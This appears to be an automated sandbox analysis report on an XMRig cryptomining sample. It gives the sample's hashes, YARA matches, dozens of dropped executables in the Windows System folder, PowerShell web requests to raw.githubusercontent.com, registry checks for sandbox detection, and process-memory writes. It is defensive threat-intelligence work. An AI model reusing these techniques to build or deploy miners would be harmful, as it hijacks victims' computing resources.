xmrig | b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6

Analysis

max time kernel
93s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 22:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
Size

1.9MB
MD5

8674ea8506502b79c6965b7daf093e10
SHA1

da78c4ade02f116b6deff9e56f476ca6c62d3382
SHA256

b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6
SHA512

496ca766c2aaf396d349cbb48285f266feb6722dfd3fb10a55238f8af250ea283c44376c977f6cd5b17b01e90b5928f5cb7ad4b086001e4eecac11deba732aa5
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pCB2lUj:NABQ

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 49 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3076-305-0x00007FF7EDD50000-0x00007FF7EE142000-memory.dmp	xmrig
behavioral2/memory/3524-320-0x00007FF7852B0000-0x00007FF7856A2000-memory.dmp	xmrig
behavioral2/memory/2140-323-0x00007FF68EBA0000-0x00007FF68EF92000-memory.dmp	xmrig
behavioral2/memory/4048-333-0x00007FF6842C0000-0x00007FF6846B2000-memory.dmp	xmrig
behavioral2/memory/1780-389-0x00007FF67B510000-0x00007FF67B902000-memory.dmp	xmrig
behavioral2/memory/3872-393-0x00007FF693790000-0x00007FF693B82000-memory.dmp	xmrig
behavioral2/memory/4348-400-0x00007FF64C910000-0x00007FF64CD02000-memory.dmp	xmrig
behavioral2/memory/2096-405-0x00007FF722C80000-0x00007FF723072000-memory.dmp	xmrig
behavioral2/memory/3400-378-0x00007FF671540000-0x00007FF671932000-memory.dmp	xmrig
behavioral2/memory/4652-372-0x00007FF65E160000-0x00007FF65E552000-memory.dmp	xmrig
behavioral2/memory/4848-369-0x00007FF7A4560000-0x00007FF7A4952000-memory.dmp	xmrig
behavioral2/memory/1028-365-0x00007FF7A8F30000-0x00007FF7A9322000-memory.dmp	xmrig
behavioral2/memory/4836-361-0x00007FF61CF40000-0x00007FF61D332000-memory.dmp	xmrig
behavioral2/memory/1476-319-0x00007FF65F120000-0x00007FF65F512000-memory.dmp	xmrig
behavioral2/memory/4492-312-0x00007FF6F58B0000-0x00007FF6F5CA2000-memory.dmp	xmrig
behavioral2/memory/2912-311-0x00007FF7E6310000-0x00007FF7E6702000-memory.dmp	xmrig
behavioral2/memory/2424-170-0x00007FF7D5D20000-0x00007FF7D6112000-memory.dmp	xmrig
behavioral2/memory/340-160-0x00007FF7934A0000-0x00007FF793892000-memory.dmp	xmrig
behavioral2/memory/2008-157-0x00007FF75D0B0000-0x00007FF75D4A2000-memory.dmp	xmrig
behavioral2/memory/944-139-0x00007FF62EA80000-0x00007FF62EE72000-memory.dmp	xmrig
behavioral2/memory/2660-120-0x00007FF7C9D60000-0x00007FF7CA152000-memory.dmp	xmrig
behavioral2/memory/3476-100-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp	xmrig
behavioral2/memory/1668-78-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp	xmrig
behavioral2/memory/1120-1181-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp	xmrig
behavioral2/memory/2644-1300-0x00007FF7C8DB0000-0x00007FF7C91A2000-memory.dmp	xmrig
behavioral2/memory/1780-2832-0x00007FF67B510000-0x00007FF67B902000-memory.dmp	xmrig
behavioral2/memory/3476-2863-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp	xmrig
behavioral2/memory/1668-2862-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp	xmrig
behavioral2/memory/1120-2859-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp	xmrig
behavioral2/memory/2660-2865-0x00007FF7C9D60000-0x00007FF7CA152000-memory.dmp	xmrig
behavioral2/memory/944-2867-0x00007FF62EA80000-0x00007FF62EE72000-memory.dmp	xmrig
behavioral2/memory/2008-2869-0x00007FF75D0B0000-0x00007FF75D4A2000-memory.dmp	xmrig
behavioral2/memory/3076-2871-0x00007FF7EDD50000-0x00007FF7EE142000-memory.dmp	xmrig
behavioral2/memory/2912-2875-0x00007FF7E6310000-0x00007FF7E6702000-memory.dmp	xmrig
behavioral2/memory/2424-2874-0x00007FF7D5D20000-0x00007FF7D6112000-memory.dmp	xmrig
behavioral2/memory/1028-2879-0x00007FF7A8F30000-0x00007FF7A9322000-memory.dmp	xmrig
behavioral2/memory/3872-2887-0x00007FF693790000-0x00007FF693B82000-memory.dmp	xmrig
behavioral2/memory/1476-2893-0x00007FF65F120000-0x00007FF65F512000-memory.dmp	xmrig
behavioral2/memory/2140-2891-0x00007FF68EBA0000-0x00007FF68EF92000-memory.dmp	xmrig
behavioral2/memory/3400-2889-0x00007FF671540000-0x00007FF671932000-memory.dmp	xmrig
behavioral2/memory/4492-2885-0x00007FF6F58B0000-0x00007FF6F5CA2000-memory.dmp	xmrig
behavioral2/memory/4348-2884-0x00007FF64C910000-0x00007FF64CD02000-memory.dmp	xmrig
behavioral2/memory/4048-2882-0x00007FF6842C0000-0x00007FF6846B2000-memory.dmp	xmrig
behavioral2/memory/340-2878-0x00007FF7934A0000-0x00007FF793892000-memory.dmp	xmrig
behavioral2/memory/4836-2923-0x00007FF61CF40000-0x00007FF61D332000-memory.dmp	xmrig
behavioral2/memory/4652-2921-0x00007FF65E160000-0x00007FF65E552000-memory.dmp	xmrig
behavioral2/memory/2096-2930-0x00007FF722C80000-0x00007FF723072000-memory.dmp	xmrig
behavioral2/memory/3524-2920-0x00007FF7852B0000-0x00007FF7856A2000-memory.dmp	xmrig
behavioral2/memory/4848-2917-0x00007FF7A4560000-0x00007FF7A4952000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

9 2176 powershell.exe
13 2176 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2176 powershell.exe

flow	pid	process
9	2176	powershell.exe
13	2176	powershell.exe

pid	process
2176	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

wHmEJWG.exeCAsbxoe.exeSfPgjCB.exeEJeLXro.exeyiSRTrm.exezMrMvmJ.exeVDlaYNW.exeIiAVSGl.exeITSBtzM.exeJwNvlxM.exeobfDxaN.exeUHVeuYs.exeastXCns.exexanDdLS.exeEgcHqTM.exeWrhNQHX.exepjgjBJI.exedJGdDed.exesdCnYHo.exebChLxer.exeotiFLuC.exeOWBtRHR.exevzJkLiL.execfaeeFt.exeTxstdsu.exekawCIla.exeyyPhrmd.exedVYPUjx.exeXyKgSPP.exeLlmebEP.exerfhubhm.exeizkJDOC.execRCEJVd.exehAgbjiB.exeZRtTNMt.exeiRyrlBv.exeuGfaAgh.exeuCQGqtp.exebjZHtOs.exeyyNXXcc.exeKuTVEqB.exeiZwYhjB.exepcYHNsL.exegFtSiMv.exeNkitgqS.exeDpSxgTN.exeWYrGVCv.exegdrcmhC.exeqjuTMZz.exebTsJVyv.exeuXLxHse.exeEdgEeaq.exeYAsKfXg.exexJQWVDR.exeoZBdgWS.exeYcyGWJj.exewizQScM.exeUSUssdJ.exeWInAuUi.exeswVRqiw.exewKPRvHD.exemPRWWgt.exersixrhY.exejSMgFsJ.exe

pid	process
1120	wHmEJWG.exe
1780	CAsbxoe.exe
1668	SfPgjCB.exe
3476	EJeLXro.exe
2660	yiSRTrm.exe
944	zMrMvmJ.exe
2008	VDlaYNW.exe
340	IiAVSGl.exe
3872	ITSBtzM.exe
2424	JwNvlxM.exe
3076	obfDxaN.exe
2912	UHVeuYs.exe
4492	astXCns.exe
1476	xanDdLS.exe
4348	EgcHqTM.exe
3524	WrhNQHX.exe
2140	pjgjBJI.exe
4048	dJGdDed.exe
4836	sdCnYHo.exe
1028	bChLxer.exe
2096	otiFLuC.exe
4848	OWBtRHR.exe
4652	vzJkLiL.exe
3400	cfaeeFt.exe
4820	Txstdsu.exe
2076	kawCIla.exe
4352	yyPhrmd.exe
2164	dVYPUjx.exe
4732	XyKgSPP.exe
2524	LlmebEP.exe
3000	rfhubhm.exe
388	izkJDOC.exe
396	cRCEJVd.exe
4740	hAgbjiB.exe
4988	ZRtTNMt.exe
3492	iRyrlBv.exe
5108	uGfaAgh.exe
2224	uCQGqtp.exe
3428	bjZHtOs.exe
4484	yyNXXcc.exe
2640	KuTVEqB.exe
4744	iZwYhjB.exe
3192	pcYHNsL.exe
4280	gFtSiMv.exe
1872	NkitgqS.exe
2208	DpSxgTN.exe
2612	WYrGVCv.exe
2668	gdrcmhC.exe
1232	qjuTMZz.exe
4468	bTsJVyv.exe
2656	uXLxHse.exe
4856	EdgEeaq.exe
3252	YAsKfXg.exe
1456	xJQWVDR.exe
4268	oZBdgWS.exe
2880	YcyGWJj.exe
4568	wizQScM.exe
316	USUssdJ.exe
2968	WInAuUi.exe
760	swVRqiw.exe
1020	wKPRvHD.exe
8	mPRWWgt.exe
1608	rsixrhY.exe
4552	jSMgFsJ.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 raw.githubusercontent.com
9 raw.githubusercontent.com

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2644-0-0x00007FF7C8DB0000-0x00007FF7C91A2000-memory.dmp	upx
C:\Windows\System\wHmEJWG.exe	upx
behavioral2/memory/1120-6-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp	upx
C:\Windows\System\CAsbxoe.exe	upx
C:\Windows\System\SfPgjCB.exe	upx
C:\Windows\System\EJeLXro.exe	upx
C:\Windows\System\IiAVSGl.exe	upx
C:\Windows\System\EgcHqTM.exe	upx
C:\Windows\System\bChLxer.exe	upx
C:\Windows\System\otiFLuC.exe	upx
C:\Windows\System\kawCIla.exe	upx
C:\Windows\System\rfhubhm.exe	upx
behavioral2/memory/3076-305-0x00007FF7EDD50000-0x00007FF7EE142000-memory.dmp	upx
behavioral2/memory/3524-320-0x00007FF7852B0000-0x00007FF7856A2000-memory.dmp	upx
behavioral2/memory/2140-323-0x00007FF68EBA0000-0x00007FF68EF92000-memory.dmp	upx
behavioral2/memory/4048-333-0x00007FF6842C0000-0x00007FF6846B2000-memory.dmp	upx
behavioral2/memory/1780-389-0x00007FF67B510000-0x00007FF67B902000-memory.dmp	upx
behavioral2/memory/3872-393-0x00007FF693790000-0x00007FF693B82000-memory.dmp	upx
behavioral2/memory/4348-400-0x00007FF64C910000-0x00007FF64CD02000-memory.dmp	upx
behavioral2/memory/2096-405-0x00007FF722C80000-0x00007FF723072000-memory.dmp	upx
behavioral2/memory/3400-378-0x00007FF671540000-0x00007FF671932000-memory.dmp	upx
behavioral2/memory/4652-372-0x00007FF65E160000-0x00007FF65E552000-memory.dmp	upx
behavioral2/memory/4848-369-0x00007FF7A4560000-0x00007FF7A4952000-memory.dmp	upx
behavioral2/memory/1028-365-0x00007FF7A8F30000-0x00007FF7A9322000-memory.dmp	upx
behavioral2/memory/4836-361-0x00007FF61CF40000-0x00007FF61D332000-memory.dmp	upx
behavioral2/memory/1476-319-0x00007FF65F120000-0x00007FF65F512000-memory.dmp	upx
behavioral2/memory/4492-312-0x00007FF6F58B0000-0x00007FF6F5CA2000-memory.dmp	upx
behavioral2/memory/2912-311-0x00007FF7E6310000-0x00007FF7E6702000-memory.dmp	upx
C:\Windows\System\LlmebEP.exe	upx
C:\Windows\System\cRCEJVd.exe	upx
C:\Windows\System\izkJDOC.exe	upx
C:\Windows\System\XyKgSPP.exe	upx
C:\Windows\System\dVYPUjx.exe	upx
behavioral2/memory/2424-170-0x00007FF7D5D20000-0x00007FF7D6112000-memory.dmp	upx
C:\Windows\System\Txstdsu.exe	upx
behavioral2/memory/340-160-0x00007FF7934A0000-0x00007FF793892000-memory.dmp	upx
C:\Windows\System\OWBtRHR.exe	upx
behavioral2/memory/2008-157-0x00007FF75D0B0000-0x00007FF75D4A2000-memory.dmp	upx
C:\Windows\System\yyPhrmd.exe	upx
C:\Windows\System\vzJkLiL.exe	upx
C:\Windows\System\sdCnYHo.exe	upx
behavioral2/memory/944-139-0x00007FF62EA80000-0x00007FF62EE72000-memory.dmp	upx
C:\Windows\System\WrhNQHX.exe	upx
C:\Windows\System\cfaeeFt.exe	upx
C:\Windows\System\xanDdLS.exe	upx
C:\Windows\System\pjgjBJI.exe	upx
behavioral2/memory/2660-120-0x00007FF7C9D60000-0x00007FF7CA152000-memory.dmp	upx
C:\Windows\System\dJGdDed.exe	upx
C:\Windows\System\astXCns.exe	upx
C:\Windows\System\UHVeuYs.exe	upx
C:\Windows\System\JwNvlxM.exe	upx
C:\Windows\System\ITSBtzM.exe	upx
behavioral2/memory/3476-100-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp	upx
C:\Windows\System\zMrMvmJ.exe	upx
C:\Windows\System\obfDxaN.exe	upx
C:\Windows\System\yiSRTrm.exe	upx
C:\Windows\System\VDlaYNW.exe	upx
behavioral2/memory/1668-78-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp	upx
behavioral2/memory/1120-1181-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp	upx
behavioral2/memory/2644-1300-0x00007FF7C8DB0000-0x00007FF7C91A2000-memory.dmp	upx
behavioral2/memory/1780-2832-0x00007FF67B510000-0x00007FF67B902000-memory.dmp	upx
behavioral2/memory/3476-2863-0x00007FF7971D0000-0x00007FF7975C2000-memory.dmp	upx
behavioral2/memory/1668-2862-0x00007FF7A1EA0000-0x00007FF7A2292000-memory.dmp	upx
behavioral2/memory/1120-2859-0x00007FF65CE70000-0x00007FF65D262000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

Processes:

b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe

description	ioc	process
File created	C:\Windows\System\rxfNtrL.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\dnduxEV.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\TdJAitv.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\awLsLjH.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\ObcHUvK.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\dWxRBco.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\SMAEXrg.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\jtkkLZX.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\UIDvnaK.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\GqTRdxr.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\erpcIsA.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\HBMwpdf.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\MvnlTXZ.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\DzbjbsO.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\UlEehEr.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\joWjDwO.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\CQVffBr.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\xNrbCfO.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\rabAlfY.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\vImYRDf.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\ZfjaSaX.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\sZzways.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\tvnunQG.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\IUEczMH.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\JllqhHV.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\LMyLpks.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\UQTwaLt.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\XYqIXpW.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\uFqLNaC.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\PLjCWxp.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\qNKhPNX.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\JCgYccO.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\qCUgWFK.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\bUNOYCm.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\yBhLDMX.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\cAxHVLp.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\mSvNQuB.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\BQPWtwg.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\BCtOghN.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\JOvmYjT.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\yneEEQZ.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\YXbZymU.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\bTsJVyv.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\zoPclrb.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\zYNmVER.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\knVxztw.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\IumrOoN.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\LXNmtDj.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\VDcbxal.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\pKpmckA.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\zxjfLfk.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\SAwSpkA.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\FJQFisq.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\SXwAXqC.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\PQGMtcY.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\qWOhndT.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\WPBBfLf.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\iIlfrcr.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\moKFMYq.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\gcYDuzc.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\KCRhJyK.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\bMPVaIU.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\naAflQq.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
File created	C:\Windows\System\qiciyMi.exe	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

wermgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2176 powershell.exe
2176 powershell.exe
2176 powershell.exe

pid	process
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exepowershell.exe

description	pid	process
Token: SeLockMemoryPrivilege	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeLockMemoryPrivilege	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe

description	pid	process	target process
PID 2644 wrote to memory of 2176	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	powershell.exe
PID 2644 wrote to memory of 2176	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	powershell.exe
PID 2644 wrote to memory of 1120	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	wHmEJWG.exe
PID 2644 wrote to memory of 1120	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	wHmEJWG.exe
PID 2644 wrote to memory of 1668	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	SfPgjCB.exe
PID 2644 wrote to memory of 1668	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	SfPgjCB.exe
PID 2644 wrote to memory of 1780	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	CAsbxoe.exe
PID 2644 wrote to memory of 1780	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	CAsbxoe.exe
PID 2644 wrote to memory of 3476	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	EJeLXro.exe
PID 2644 wrote to memory of 3476	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	EJeLXro.exe
PID 2644 wrote to memory of 2660	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	yiSRTrm.exe
PID 2644 wrote to memory of 2660	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	yiSRTrm.exe
PID 2644 wrote to memory of 944	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	zMrMvmJ.exe
PID 2644 wrote to memory of 944	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	zMrMvmJ.exe
PID 2644 wrote to memory of 2008	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	VDlaYNW.exe
PID 2644 wrote to memory of 2008	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	VDlaYNW.exe
PID 2644 wrote to memory of 340	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	IiAVSGl.exe
PID 2644 wrote to memory of 340	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	IiAVSGl.exe
PID 2644 wrote to memory of 3872	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	ITSBtzM.exe
PID 2644 wrote to memory of 3872	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	ITSBtzM.exe
PID 2644 wrote to memory of 2424	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	JwNvlxM.exe
PID 2644 wrote to memory of 2424	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	JwNvlxM.exe
PID 2644 wrote to memory of 3076	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	obfDxaN.exe
PID 2644 wrote to memory of 3076	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	obfDxaN.exe
PID 2644 wrote to memory of 2912	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	UHVeuYs.exe
PID 2644 wrote to memory of 2912	2644	b95b009bde1918bc6e9ed8c162591b7ac13eda7d5e954f5a0b9219d4f0424aa6N.exe	UHVeuYs.exe
